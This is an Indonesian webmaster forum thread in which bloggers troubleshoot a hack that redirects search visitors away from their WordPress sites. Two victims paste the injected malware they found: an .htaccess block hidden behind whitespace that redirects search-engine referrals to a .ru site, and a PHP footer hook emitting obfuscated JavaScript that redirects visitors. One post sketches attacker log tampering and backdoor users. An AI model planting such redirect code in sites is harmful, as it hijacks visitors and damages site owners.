NgeHacknya Kejam Banget | Visitor sampe down 90% hati-hati agan juga bisa kena

Malem gan...newbie pingin curhat ttg sesuatu yang aneh di blog ane.
Kejadiannya, waktu itu ane search di google dengan keyword andalan blog yg ane punya, betapa terkejutnya bukannya blog ane yang kebuka malah situs _groupper.org yg entah punya siapa, jadi site ane semacam ke redirect gitu ...
Kemudian ane tekan tombol back terus ane klik lagi hasil pencarian di google , dan kebuka lah blog ane secara normal ... ternyata kejadian redirect itu terjadi cuman SEKALI
Ane cemas banget , mungkinkah gara-gara ini visitor down abiz2an sebulan terakhir ... , padahal dari awal statistik2 sebelum2na mengalami kenaikan .. link building juga jalan terus...
Terus ane coba beberapa blog ane yang lain di satu hosting , dengan cara yang sama , ada sekitar puluhan yang kena cuman tinggal beberapa biji yang masih normal...
terus coba ke warnet, hl yg sma terjadi, semua ke redirect, tpi pas nyoba kedua kali , kliatan normal ...
ane coba search di google nemu ada bule juga yang kena :

To see how it operates, it is crucial that you follow the following steps EXACTLY. If you don't. you may miss what is happening.

1. Search in google for " [obscured] lawtutors dot co.uk".

2. find the google link to out site.

3. Click the link.

Notice that you re redirected to another site - groupper.org.

CAREFUL - this will happen only once. Once you have actually visited our site, the redirect will no longer operate. So, you must make a record the first time it happens.

Obviously this is a compelte nightmare ...
Mungkin kasusnya masih langka kali ya, agan2 ada punya pengalaman yang sama ?

 

Waduhh Gawat juga nh...

Pake Wordpress kah..???

 

Yoi gan

 

terus solusinya gimana gan untuk mengembalikan secara normal, ane sih pernah juga kejadian seperti yang agan alami. cuman setelah ane cek ternyata penyebabnya gara2 pasang kode tracking globe statistic.

Kalo yang kasus agan ini gimana?

 

Klw pasang kode tracking globe statistic belom pernah gan..wktu itu ada pasang script paid to promote .. abiz kejadian ini ane apus scriptnya , ane tes pake proxy , masih redirect ke t4 ygsama
ane udh lakuin :
1. kirim ticket ke pihak hosting, lgi nunggu
2. scan dimari,_http://sitecheck.sucuri.net/scanner/ , g ada kedetek
3. ubek2 lwt file manager, cari2 script java script redirect yg pernh disisipin dlu ..., g ada yg aneh...

 

ane jg pernah web ane diredirect... tp gara2 script infolinks... entah apa salah setting ato apa... tp pas scriptnya tak lepas dah normal

 

klo redirect gitu, biasanya kenanya di file .htaccess
ane dulu pernah, redirectnya random, sekilas blog kyk gak kena apa2, biasa aja, tp kadang tiba2 redirect gitu

 

coba cari linknya di index.php dalam folder domain gan, biasanya diinject-kan kesitu, kalo ketemu delet aja biasanya lgsg normal, trus ngamaninnya lgi biar gak diijek lgi ane yg jga kagak ngerti tuh

 

ngeceknya lagi tetep pake ip yg sama gan ?

---------- Post added at 08:08 PM ---------- Previous post was at 08:06 PM ----------

htaccces ane isinya bgini gan :
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress





---------- Post added at 08:10 PM ---------- Previous post was at 08:08 PM ----------

udh ane cari di index.php, function.php g ada
btw makasih sarannya gan ...

 

coba cek di setiap file index bro, bukan sekedar file indexnya theme.

 

ane juga kena satu host semua diredirect dan semua dari htaccess
coba perhatiin script di htaccess ada space kosong nga diatas sebelum

Code:

																																																												
																														<IfModule mod_rewrite.c>																														
																														RewriteEngine On																														
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														
																														RewriteRule ^(.*)$ http://daliachuuaroyalys.ru/industry/index.php [R=301,L]																														
																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
																														RewriteRule ^(.*)$ http://daliachuuaroyalys.ru/industry/index.php [R=301,L]																														
																														</IfModule>																														
																																																												






# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

ane sertakan nie script yang ngeredirect site ane seolah2 nga ada apa2 kan coba scroll ampe ujung
ane aja awal nya nga nyangka ternyata
kalo ada coba ente scroll ampe nemu tu script redirect nya

kalo bener hasilnya sama saat ini cuman 1 cara nya
install di host baru ambil DB nya doank
baru dipindah tapi jangan sampe file Wp nya ente ikutkan cuman DB nya doank yang bisa save kata support host ane

 

makasih om sarannya ...
wah bahaya banget,,, hackernya naro script kgak kliatan ...skalinya diujung disisipin ...
..udh ane cek .. g ada script sprti itu ...
klw mnurut om...hosting yg lama itu enakny di apainnya ? delete smua kah hbiz export databasenya...

 

nie baru ane coba delete semua belum tau apakah setelah 20 menit muncul lagi tu htaccess kalo iya paling minta setup ulang sama host nya

 

ya kalo misal nya blog ombro kena ,, dan di check yang satu hosting blog masbro juga kena ,,"ini kalau di blog yang satu hosting kena yaaa" saran saya sih pindah hosting .. *kenapa pindah ya di takutkan tuh root utama nya di uid = 0 nya udah di susupi juga banyak pihak host yang tidak tahu kalau selama ini root uid (0) mereka telah disusupi *kenapa saya bilang pihak hosting tidak tahu *karena pihak ha*ker tentunya tidak akan meninggalkan jejaknya, yaitu dengan cara meng edit file log nya, kenapa di edit ini alasan sang ha*ker * kalau di hapus tentu saja akan ketahuan pihak root dari host tersebut karena data log kosong telah ke hapus. ini berbahaya buat sang ha*ker dan kalau di ganti passwd root tersebut ya pihak host dengan senantiasa tinggal reset password jadi kemungkinan sang ha*ker membuat usser baru pada "/usr/bin/rsh " bisa dimana saja kalau dia add hanya di root pasti akan muncul usser baru pada di rectori /home/ *berbahaya pihak host akan dengan mudah mengetahuinya, dan sang ha*ker akan kehilangan jalan pintas nya untuk jadi root uid = 0 *inilah jika sang ha*ker yang tidak ingin kegiatanya ketahuan jika di trace oleh pihak hosting, tapi tentu saja sang ha*ker akan senantiasa masuk dan keluar dari root dengan mudah karena pasti mereka sudah melakukan backconnetc dan sudah membuat usser baru, * untuk memudahkan masuk kembali di kemudian hari. mungkin itu saja menurut ane kalo kena nya ada blog lain yang satu hosting juga kena , dan jangan salahkan pihak hosting karena memang pihak hosting tidak tahu :entalah: kalau ada yang berjalan di belakang aktivitas mereka . ini lah kenapa sang ha*ker tidak mudah di trace saat dia melakukan aktivitasnya atau setelah mereka berhasil mendapatkan root dari hasil rooting dan pergi atau datang lagi di kemudian hari dengan usser yang telah dia buat dan sudah di back connect sama dia :sst: karena memang lognya di edit bukan di hapus. dan di check lagi setiap file index nya , htacceess nya pastikan kalau htaccess nya dalam permms 444 dan file folder 755 dan jangan memasang plugin atau theme yang didalam file tersebut ada file thimthumb.php ya tapi seterah sih,, itu hak anda mau pasang atau tidak kenapa saya bilang jangan di pasang ini alasannya * thimthhum.php melakukan aktivitasnya jadi seperti ini thimthumb.php?scr=*file*

 

coba cek semua file index.php / index.htm / index.html di semua path. Dari kasus ini ada akun klien yang di server US ada 15 program jahat yang nyusup di file index.
Untungnya support dari Hostgator lumayan bagus. jadi virusnya cepet ketangkep dan gak nyebar kemana-mana.

 

coba hapus semua file wp ,dan catat wpconfig.php nya.dan coba search dari google kalo gak redirek berarti file wp nya yang kena ,tinggal ganti baru .pernah juga kek gini

 

pindah hosting mas, itu sudah ke-ROOT..

lapor ke hostingnya deh..

---------- Post added at 07:22 AM ---------- Previous post was at 07:19 AM ----------

kalau dari idenya si hacker :RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://daliachuuaroyalys.ru/industry/index.php [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://daliachuuaroyalys.ru/industry/index.php [R=301,L]

itu kayanya semua bot mau dilarikan ke sitenya ya.. hehe... klo visitor akan datang pada alamat anda, tapi klo bot dia lari, akibatnya, index anda menyusut di engine.

 

kalau masalah TS ini saya pernah baca bisa juga krn script cpm paid to promote ,,
dulu saya pernah baca katanya paid to promote bisa mengalihkan traffict ke iklan dia..

 

Makasih mastah, ane coba pindah hosting... iya.. ane pake thimthumb.php buat semua blog ane ... ane curiga juga, bisa cebol lewat situ, script thimthumb juni 2011 blum ada ane update ...

---------- Post added at 11:42 PM ---------- Previous post was at 11:40 PM ----------

Iya,,, dia nyerang semua blog di hosting Hawkhost ane... kmren juga smpat dibersihin...trims gan atas sarannya

---------- Post added at 11:49 PM ---------- Previous post was at 11:42 PM ----------

klw agan dlu , jalar ke blog2 lainnya yang satu hosting juga, g ?
mksih sarannya, bsok ane coba dulu gan, sblum pindahan ...

---------- Post added at 11:57 PM ---------- Previous post was at 11:49 PM ----------

ternyata itu maksud script yg disisipi di htaccess... berarti mksud hackerx menghancurkan blog trget, script di htaccess menyusutkan index, script php di footer & function , meredirect visitor dari SE ke blogx hacker... berikut script yang di footer.php ama function.php (kadang ada juga di header.php)

Code:

<?php
add_action('get_footer', 'add_sscounter');
            function add_sscounter(){
                        echo '<!--scounter-->';
                        if(function_exists('is_user_logged_in')){
                                    if(time()%2 == 0 && !is_user_logged_in()){                        
                                                echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
                                    }
                        }
            }
?>

CMIIW

---------- Post added 02-19-2012 at 12:02 AM ---------- Previous post was 02-18-2012 at 11:57 PM ----------

Iy gan, ane pernah ikut paid to promote ..


oh iy berikut ini postingan yang isinya percobaan _ane ngatasin msalah redirect (tapi blum juga teratasi) dan kronologi kejadiannya... maaf bahasanya acak adut...
_http://hurufh.blogspot.com/2012/02/kucing-hacker-sialan.html

 

Wah ngeri juga ya,, boleh tahu URL blognya yang kena hack gan??